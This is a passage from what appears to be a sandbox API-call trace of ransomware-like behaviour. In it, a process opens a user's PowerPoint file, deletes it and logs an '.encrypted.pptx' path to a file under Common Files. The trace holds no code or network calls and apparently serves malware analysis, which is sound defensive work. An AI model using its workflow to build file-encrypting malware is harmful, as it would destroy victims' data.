lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.502] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\szlym.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0036.502] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x942070 | out: hHeap=0x770000) returned 1 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.503] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.503] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.503] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.503] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.503] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.503] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.504] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cbb0 [0036.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cbb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0036.504] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.505] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.505] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0036.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.505] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.506] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.506] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.506] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFilePart=0x0) returned 0x44 [0036.506] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x15771600, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0x7c2240 [0036.506] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\szlym.pptx")) returned 1 [0036.508] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x15771600, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0 [0036.508] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.508] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.508] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.508] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.508] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.509] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.509] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.509] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.509] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.509] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.509] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.509] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.509] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.509] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.510] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.510] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1eb0, lpOverlapped=0x0) returned 1 [0036.510] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.510] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1eb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.510] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.encrypted.pptx\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0036.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0036.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.encrypted.pptx\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 81 [0036.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0036.535] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0036.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.535] CloseHandle (hObject=0x128) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.536] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.536] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: 